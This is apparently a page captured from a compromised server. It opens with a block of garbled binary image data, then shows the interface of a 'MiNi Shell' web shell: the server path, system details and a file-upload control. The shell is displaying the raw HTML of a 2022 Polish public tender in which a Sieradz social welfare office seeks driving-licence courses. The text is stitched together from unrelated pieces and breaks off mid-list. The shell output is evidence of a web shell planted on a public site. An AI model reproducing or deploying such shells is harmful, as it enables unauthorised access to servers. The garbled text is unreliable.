JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220623/0022138601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie szkolenia prawo jazdy kat. B oraz zorganizowanie <br/>i przeprowadzenie cyklu szkoleń dla kierowców </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005260237</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Polna</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sieradz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mops.sieradz.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.sieradz.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Miasto Sieradz</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 827-223-77-37</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">plac Wojewódzki 1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Sieradz</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">98-200</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">43 8266114</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@umsieradz.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://bip.umsieradz.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie szkolenia prawo jazdy kat. B oraz zorganizowanie <br/>i przeprowadzenie cyklu szkoleń dla kierowców </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-915b3d5a-f2de-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00221386</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024653/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zorganizowanie i przeprowadzenie szkolenia prawo jazdy kat.B oraz Zorganizowanie i przeprowadzenie cyklu szkoleń dla kierowców</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Klucz do nowego jutra” współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania IX.1.1 Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014 - 2020, umowa : RPLD.09.01.01-10-A004/20-00 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmsieradz.e-zp.finn.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W przedmiotowym postępowaniu o zamówienie publiczne komunikacja odbywa się<br/>przy użyciu środków komunikacji elektronicznej, za pośrednictwem Systemu e-ZP pod adresem https://gmsieradz.e-zp.finn.pl ,<br/>zwanego dalej Systemem. 2.Wymagania formalne dotyczące składanych oświadczeń i dokumentów opisane są w rozdziale XXIII<br/>SWZ.<br/>3. Osoba wskazana do komunikowania się z Wykonawcami: Artur Ciepłucha, tel. 43 826-61-14, 43 826-61-10.<br/>UWAGA! Przed przystąpieniem do składania oferty wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Systemu<br/>(zwaną dalej Instrukcją). Instrukcja została zamieszczona w Systemie pod adresem: https://pomoc. e-zp.finn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokonując rejestracji Wykonawca<br/>akceptuje Regulamin korzystania z Systemu. Regulamin korzystania z Systemu dostępny jest pod adresem: https://gmsieradz.ezp.<br/>finn.pl/regulations/REGU<br/>5.W Systemie znajdują się także instrukcja dla Wykonawcy (Instrukcja obsługi Systemu FINN e-Zamówienia Publiczne) oraz filmy<br/>instruktażowe prezentujące podstawowe czynności dokonywane przez Wykonawców za pomocą Systemu (rejestracja, zadawanie<br/>pytań, złożenie oferty, wycofanie oferty). Instrukcja dostępna jest pod adresem: https://pomoc.e-zp.finn.pl/<br/>6.Złożenie oferty/oferty dodatkowej w trybie podstawowym/oferty dodatkowej poprzez System wymaga posiadania przez<br/>Wykonawcę kwalifikowanego podpisu elektronicznego lub podpisu osobistego lub podpisu zaufanego.<br/>7.Kwalifikowany podpis elektroniczny musi być wystawiony przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem<br/>świadczącym usługi certyfikacyjne – podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5<br/>września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej (Dz. U. z 2021 poz. 1797).<br/>8. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych Systemu:<br/>a) format kodowania treści w obrębie Systemu – UTF8,<br/>b) komunikacja pomiędzy przeglądarką Wykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS,<br/>c) oznaczeniem czasu odbioru danych przez System jest data oraz dokładny czas (hh:mm:ss) – czas lokalny serwera<br/>synchronizowany odpowiednim źródłem czasu.<br/>9. Wymagania techniczne związane z korzystaniem z Systemu (tj. informacje dotyczące specyfikacji połączenia, formatu<br/>przesyłanych danych oraz kodowania i oznaczania czasu przekazania danych):<br/>a) stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s,<br/>b) zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze,<br/>c) system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14 i późniejsze, dystrybucje systemu Linux,<br/>d) korzystanie z wbudowanej w System funkcjonalności składania podpisu elektronicznego możliwe jest pod warunkiem, że system<br/>teleinformatyczny, z którego korzysta Wykonawca, wyposażony jest w jeden z poniższych komponentów:<br/>- wirtualna maszyna Java firmy Oracle w wersji co najmniej 1.8.0_221 (Java SE JRE 8 Update 221) z obsługą technologii Java Web<br/>Start (JavaWS) lub<br/>- wirtualna maszyna OpenJDK w wersji co najmniej 1.8.0_222 z zainstalowanym rozszerzeniem IcedTea Web Start.<br/>Powyższe wymagania nie ograniczają możliwości korzystania przez Wykonawcę z zewnętrznego oprogramowania do składania<br/>podpisu elektronicznego,<br/>e) kwalifikowany podpis elektroniczny (dopuszczalne formaty podpisów: PaDES - format.pdf, XaDES - pozostałe formaty),<br/>f) podpis zaufany,<br/>g) certyfikat osobisty,<br/>h) dopuszczalne formaty danych: .txt, .pdf, .xls, .doc,.docx, .rtf, .odt, .rtf, .xml (zalecany .pdf),<br/>i) maksymalny rozmiar przesyłanych plików złożenia, wycofania: oferty/oferty dodatkowej w trybie podstawowym/ oferty dodatkowej<br/>oraz wiadomości wynosi 150 MB,<br/>j) w zakresie dotyczącym kodowania i czasu odbioru danych Zamawiający informuje, że złożona przez Wykonawcę za pomocą<br/>Systemu oferta jest widoczna w systemie, jako zaszyfrowana, a możliwość jej odszyfrowania i otworzenia przez Zamawiającego<br/>możliwa jest po upływie terminu składania ofert.<br/>10. W zależności od formatu podpisu: podpis kwalifikowany (PAdES, XAdES), podpis osobisty (XAdES), podpis zaufany (PAdES,<br/>XAdES) i jego typu (zewnętrzny, otaczający), Wykonawca dołącza do Systemu uprzednio podpisane dokumenty wraz<br/>z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z podpisem (typ otaczający).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w załączniku nr 9 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w załączniku nr 9 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WOR-Z.271.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. Zamówienie obejmuje przeprowadzenie kursu prawa jazdy kat. B dla maksymalnie 10 osób w ramach realizowanego<br/>przez Zamawiającego projektu „Klucz do nowego jutra”, zwanego dalej Projektem.<br/>3. Celem szkolenia jest przygotowanie uczestników do egzaminu na prawo jazdy kat. B<br/>4. Szczegółowy opis przedmiotu zamówienia (dalej jako: SOPZ) zawiera załącznik nr 8 do SWZ.<br/>5. Zamawiający nie gwarantuje skierowania na szkolenia liczby osób wskazanej w pkt 2. Liczba osób kierowanych na<br/>szkolenia zależy bowiem od gotowości uczestników Projektu do podjęcia szkolenia, na co Zamawiający nie ma wpływu. W<br/>związku z powyższym, liczba osób skierowanych na szkolenie może być mniejsza. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411200-0 - Usługi szkół nauki jazdy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze oferty kierował się będzie następującymi kryteriami i sposobem oceny ofert:<br/>Dla części nr 1 zamówienia:<br/>- łączna cena ofertowa brutto - waga 60%<br/>- doświadczenie osoby skierowanej do realizacji zamówienia dla części nr 1 - waga 40%<br/>Sposób obliczania oceny za łączną cenę ofertową brutto dla części nr 1 zamówienia:<br/>(cena najniższa/cena oceniana) x 10 pkt x 60%<br/>W tym kryterium można uzyskać maksymalnie 6 punktów.<br/>W przypadku braku wskazania przez Wykonawcę w formularzu ofertowym oferowanej łącznej ceny brutto, oferta zostanie<br/>odrzucona.<br/>Sposób obliczania oceny za doświadczenie osoby skierowanej do realizacji zamówienia dla części nr 1 zamówienia:<br/>Ilość godzin szkolenia z zakresu prawa jazdy kategorii B przeprowadzonych przez osobę skierowaną do realizacji zamówienia<br/>Liczba przyznanych punktów<br/>do 100 godzin 0 pkt<br/>od 101 do 220 godzin 1 pkt<br/>od 221 do 340 godzin 2 pkt<br/>od 341 do 460 godzin 3 pkt<br/>461 godzin i powyżej 4 pkt<br/>W tym kryterium można uzyskać maksymalnie 4 punkty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby skierowanej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. Zamówienie obejmuje przeprowadzenie cyklu szkoleń dla kierowców, składających się z kursu prawa jazdy kat. C, kursu<br/>prawa jazdy C+ E, ADR oraz kwalifikacji wstępnej przyśpieszonej dla maksymalnie 10 osób (jedna grupa) w ramach<br/>realizowanego przez Zamawiającego projektu „Klucz do nowego jutra”, zwanego dalej Projektem.<br/>3. Celem szkolenia jest przygotowanie do ukończenia cyklu szkoleń dla kierowców.<br/>4. Szczegółowy opis przedmiotu zamówienia (dalej jako: SOPZ) zawiera załącznik nr 8 do SWZ.<br/>5. Zamawiający nie gwarantuje skierowania na szkolenia liczby osób wskazanej w pkt 2. Liczba osób kierowanych na<br/>szkolenia zależy bowiem od gotowości uczestników Projektu do podjęcia szkolenia, na co Zamawiający nie ma wpływu. W<br/>związku z powyższym, liczba osób skierowanych na szkolenie może być mniejsza. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411200-0 - Usługi szkół nauki jazdy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze oferty kierował się będzie następującymi kryteriami i sposobem oceny ofert:<br/>Dla części nr 2 zamówienia:<br/>- łączna cena ofertowa brutto - waga 60%<br/>- doświadczenie osób skierowanych do realizacji zamówienia dla części 2 - waga 40%<br/>Sposób obliczania oceny za łączną cenę ofertową brutto dla części nr 2 zamówienia:<br/>(cena najniższa/cena oceniana) x 10 pkt x 60%<br/>W tym kryterium można uzyskać maksymalnie 6 punktów.<br/>W przypadku braku wskazania przez Wykonawcę w formularzu ofertowym oferowanej łącznej ceny brutto, oferta zostanie<br/>odrzucona.<br/>Sposób obliczania oceny za doświadczenie osób skierowanych do realizacji zamówienia dla części nr 2 zamówienia:<br/>Kryterium obejmuje:<br/>a)doświadczenie osoby skierowanej do realizacji szkolenia z zakresu prawa jazdy kategorii C,<br/>b)doświadczenie osoby skierowanej do realizacji szkolenia z zakresu prawa jazdy kategorii C + E,<br/>c)doświadczenie osoby skierowanej do realizacji szkolenia z zakresu kwalifikacji wstępnej przyspieszonej,<br/>d)doświadczenie osoby skierowanej do realizacji szkolenia z zakresu ADR.<br/>W tym kryterium można uzyskać maksymalnie 4 punkty, po maksymalnie 1 punkcie za doświadczenie poszczególnych osób<br/>skierowanych do realizacji zamówienia, zgodnie z poniższymi tabelami.<br/>a)sposób obliczania oceny za doświadczenie osoby skierowanej do realizacji zamówienia dla części nr 2 zamówienia -<br/>doświadczenie osoby skierowanej do realizacji szkolenia z zakresu prawa jazdy kategorii C:<br/>Ilość godzin szkolenia z zakresu prawa jazdy kategorii C przeprowadzonych przez osobę skierowaną do realizacji zamówienia w tym<br/>zakresie Liczba przyznanych punktów<br/>do 120 godzin 0,0 pkt<br/>od 121 do 240 godzin 0,3 pkt<br/>od 241 do 360 godzin 0,6 pkt<br/>od 361 do 480 godzin 0,8 pkt<br/>481 godzin i powyżej 1,0 pkt<br/>b)sposób obliczania oceny za doświadczenie osoby skierowanej do realizacji zamówienia dla części nr 2 zamówienia -<br/>doświadczenie osoby skierowanej do realizacji szkolenia z zakresu prawa jazdy kategorii C + E:<br/>Ilość godzin szkolenia z zakresu prawa jazdy kategorii C+E przeprowadzonych przez osobę skierowaną do realizacji zamówienia w<br/>tym zakresie Liczba przyznanych punktów<br/>do 75 godzin 0,0 pkt<br/>od 76 do 150 godzin 0,3 pkt<br/>od 151 do 225 godzin 0,6 pkt<br/>od 226 do 300 godzin 0,8 pkt<br/>301 godzin i powyżej 1,0 pkt<br/>c)sposób obliczania oceny za doświadczenie osoby skierowanej do realizacji zamówienia dla części nr 2 zamówienia -<br/>doświadczenie osoby skierowanej do realizacji szkolenia z zakresu kwalifikacji wstępnej przyspieszonej:<br/>Ilość godzin szkolenia z zakresu kwalifikacji wstępnej przyspieszonej przeprowadzonych przez osobę skierowaną do realizacji<br/>zamówienia w tym zakresie Liczba przyznanych punktów<br/>do 420 godzin 0,0 pkt<br/>od 421 do 840 godzin 0,3 pkt<br/>od 841 do 1260 godzin 0,6 pkt<br/>od 1261 do 1680 godzin 0,8 pkt<br/>1681 godzin i powyżej 1,0 pkt<br/>d)sposób obliczania oceny za doświadczenie osoby skierowanej do realizacji zamówienia dla części nr 2 zamówienia -<br/>doświadczenie osoby skierowanej do realizacji szkolenia z zakresu ADR:<br/>Ilość godzin szkolenia z zakresu ADR przeprowadzonych przez osobę skierowaną do realizacji zamówienia w tym zakresie Liczba<br/>przyznanych punktów<br/>do 120 godzin 0,0 pkt<br/>od 121 do 240 godzin 0,3 pkt<br/>od 241 do 360 godzin 0,6 pkt<br/>od 361 do 480 godzin 0,8 pkt<br/>481 godzin i powyżej 1,0 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby skierowanej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 